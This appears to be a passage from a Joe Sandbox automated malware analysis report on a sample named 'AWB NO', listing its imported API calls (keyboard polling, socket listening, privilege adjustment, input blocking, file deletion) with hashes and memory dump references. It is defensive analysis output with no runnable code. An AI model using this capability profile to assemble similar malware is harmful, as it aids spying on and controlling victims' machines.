                                                              • GetKeyState.USER32(00000011), ref: 00460336
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0046034E
                                                              • GetKeyState.USER32(00000012), ref: 00460360
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460378
                                                              • GetKeyState.USER32(0000005B), ref: 0046038A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: ce91828b2830721cd7fb8b4a1e78d29246c37408a82e61dcc3c1647f0e02a60d
                                                              • Instruction ID: a21790649764f5473492f6fe8ccf9153751a7a7a640c343e9e208889fd979a5a
                                                              • Opcode Fuzzy Hash: ce91828b2830721cd7fb8b4a1e78d29246c37408a82e61dcc3c1647f0e02a60d
                                                              • Instruction Fuzzy Hash: B84188345047C96EFF319A6488183A7BEA0AF11345F08449FDDC6467C2F7985DC887AB
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C9F8
                                                              • FindClose.KERNEL32(00000000), ref: 0046CA4C
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046CA71
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046CA88
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046CAAF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileTime$FindLocal$CloseFirstSystem
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3238362701-2428617273
                                                              • Opcode ID: 49a437d8fe9a8bf4d63a33d636f4e1c2e92e3908f3cbc0411c5c65e589d803a7
                                                              • Instruction ID: d2fb6e3d745381a8f06c977d24fbab6bbb709d84a093e08bb2767dfa648d5eca
                                                              • Opcode Fuzzy Hash: 49a437d8fe9a8bf4d63a33d636f4e1c2e92e3908f3cbc0411c5c65e589d803a7
                                                              • Instruction Fuzzy Hash: C8A130B1508305ABC704EF65C885DAFB7ECEF94704F40492EF585D6192EA38EE48CB66
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0wK$DEFINE$OaA$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                              • API String ID: 0-14353891
                                                              • Opcode ID: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
                                                              • Instruction ID: 0f2016292ce7af36af0f0c3c89fa088be26185f2ba7aa12bc90a9d7b287e4a4c
                                                              • Opcode Fuzzy Hash: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
                                                              • Instruction Fuzzy Hash: 2C93A371A002199BDB24CF58C8817EEB7B1FF48715F24816BED45AB381E7789D86CB48
                                                              APIs
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                                • Part of subcall function 00464CD3: GetFileAttributesW.KERNEL32(?,00463947), ref: 00464CD4
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00463ADF
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00463B87
                                                              • MoveFileW.KERNEL32(?,?), ref: 00463B9A
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00463BB7
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00463BD9
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00463BF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: 81d8c034fe6a70fe18044bc73a0db0305556ffc00dcb03131ab3ab8b8c2de28d
                                                              • Instruction ID: a30d93a31dc78191619e65fc742f137fc1fb73af94d3b3548b22cf7447f1242d
                                                              • Opcode Fuzzy Hash: 81d8c034fe6a70fe18044bc73a0db0305556ffc00dcb03131ab3ab8b8c2de28d
                                                              • Instruction Fuzzy Hash: 7D5160318011489ACF05EFA1CD929EEB774AF14305F2441AEE44177192EF396F09CBAA
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 92b3f1e62438dc7ffcc85fda8050e8ed33eaeb0d782a753d95e12b88d80d85a1
                                                              • Instruction ID: 690fdb2393ba8c455721d93383ebf00db8ed132600f70b1972c2202a928a4a2e
                                                              • Opcode Fuzzy Hash: 92b3f1e62438dc7ffcc85fda8050e8ed33eaeb0d782a753d95e12b88d80d85a1
                                                              • Instruction Fuzzy Hash: D3216F35300210AFDB10AF65EC09B6E77A8EF44715F10846AF90AE72A2DB79AD05CB5D
                                                              APIs
                                                                • Part of subcall function 00458CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                                • Part of subcall function 00458CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                                • Part of subcall function 00458CC3: GetLastError.KERNEL32 ref: 00458D47
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0046549B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 579dbc82c3cff657937c2cc6ad355f0a8cb18a3333d1a6a54e1d22e8bff13c30
                                                              • Instruction ID: 2a911ff1966252bbcdf17bf9cb72554efa01d6bf79280483f84be4285ba15f08
                                                              • Opcode Fuzzy Hash: 579dbc82c3cff657937c2cc6ad355f0a8cb18a3333d1a6a54e1d22e8bff13c30
                                                              • Instruction Fuzzy Hash: E3014C71654A012AE7285774DC4ABBB7258EB04343F2406BBFC06D21C3FD5D0C84429F
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004765EF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004765FE
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 0047661A
                                                              • listen.WSOCK32(00000000,00000005), ref: 00476629
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476643
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476657
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: aac7b1a6e461488d35280cc6e2b63497f567ac7a2cb6f5e78181c7989b7b377c
                                                              • Instruction ID: e6b78beff1e5acf3df9dda2c3f3869440f41808fdec0f88b9f2d9ee8019ed42f
                                                              • Opcode Fuzzy Hash: aac7b1a6e461488d35280cc6e2b63497f567ac7a2cb6f5e78181c7989b7b377c
                                                              • Instruction Fuzzy Hash: B121D0306006009FDB10EF24C849B6EB7AAEF44324F15856EE95AE73D2CB38AD05CB59
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F6AB
                                                              • Sleep.KERNEL32(0000000A), ref: 0046F6DB
                                                              • FindNextFileW.KERNEL32(?,?), ref: 0046F7A8
                                                              • FindClose.KERNEL32(00000000), ref: 0046F7BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNextSleep
                                                              • String ID: *.*
                                                              • API String ID: 1749430636-438819550
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$OaA$VUUU$VUUU$VUUU$VUUU
                                                              • API String ID: 0-1355328534
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                              • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              APIs
                                                                • Part of subcall function 004780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00476AB1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476ADA
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476B13
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476B20
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476B34
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0046C69D
                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C6B5
                                                              • CoUninitialize.OLE32 ref: 0046C922
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00441D88,?), ref: 0047C312
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0047C324
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0047F151
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0047F15F
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0047F21F
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047F22E
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              APIs
                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0043510B
                                                              • GetCurrentThreadId.KERNEL32 ref: 0043511A
                                                              • GetCurrentProcessId.KERNEL32 ref: 00435123
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00435130
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045EB19
                                                              Strings
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • GetTimeZoneInformation.KERNEL32(004C4AF8,00000000,00000000,00000000,00000000,00000000,004BC070,00000030,00433F3B,004BC050,00000008,004270B8), ref: 004342B9
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,004C4AFC,000000FF,?,0000003F,00000000,?), ref: 00434332
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,004C4B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 0043436B
                                                                • Part of subcall function 00422F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00429C64), ref: 00422FA9
                                                                • Part of subcall function 00422F95: GetLastError.KERNEL32(00000000,?,00429C64), ref: 00422FBB
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                              • String ID:
                                                              • API String ID: 1184061189-0
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 004726D5
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0047270C
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B5AE
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B608
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B655
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                              • GetLastError.KERNEL32 ref: 00458D47
                                                              Similarity
                                                              • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                              • String ID:
                                                              • API String ID: 4244140340-0
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0046404B
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00464088
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00464091
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00464C2C
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00464C43
                                                              • FreeSid.ADVAPI32(?), ref: 00464C53
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C966
                                                              • FindClose.KERNEL32(00000000), ref: 0046C996
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A302
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A314
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458851), ref: 00458728
                                                              • CloseHandle.KERNEL32(?,?,00458851), ref: 0045873A
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00428F97,?,?,?,00000001), ref: 0042A39A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A3A3
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: a/p$am/pm
                                                              • API String ID: 0-3206640213
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: OaA
                                                              • API String ID: 0-4189730831
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF), ref: 0042CF8C
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: yZA
                                                              • API String ID: 0-3857600021
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00428884
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00474218
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00464EEC
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004588D1), ref: 00458CB3
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00442242
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A36A
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              Strings
                                                              Similarity
                                                              • API ID: Time$FileSystem
                                                              • String ID: 0uL
                                                              • API String ID: 2086374402-4127767690
                                                              • Instruction Fuzzy Hash: BB0209323051B309CF1D8A39A57003B7BE06EB27B134A476FE8B2CB6E1EE18D564D654
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: 3a63805bb8c2c01de1b6144fc2d7500bdbb157a027ed3d5f9b560445ff49f309
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: C2C1C6323050B309DB2D8639A63013FBAE15EA27B139A076FE4B3CB6D4EF58D564D614
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: aaf8636ec1f05b4987ac2accbf93641bd6487308852fa21464a5fdbc51815f71
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: 18C1B7323050B309DB2D8639A63413FBBE15EA27B139A076FE4B2DB6D4EF18D524D614
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: bd4c7480dd6a54fddd699a2b0be912f6d58b05d3aceaa853b4bc4e982cd790e2
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 3FC165363051A309DB2D863AA53403FBAE15EB27B135B076FE4B2CB6E4EF18D5249614
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                              • Instruction ID: f8190d61f8919a36a14c9958345a37d1f486bd428d3d8603b5651c9dece39b84
                                                              • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                              • Instruction Fuzzy Hash: E0B10030D2AF414DD7239A398935336BA8CAFBB2D5F51D72BFC2670D22EB2185934185
                                                              Memory Dump Source
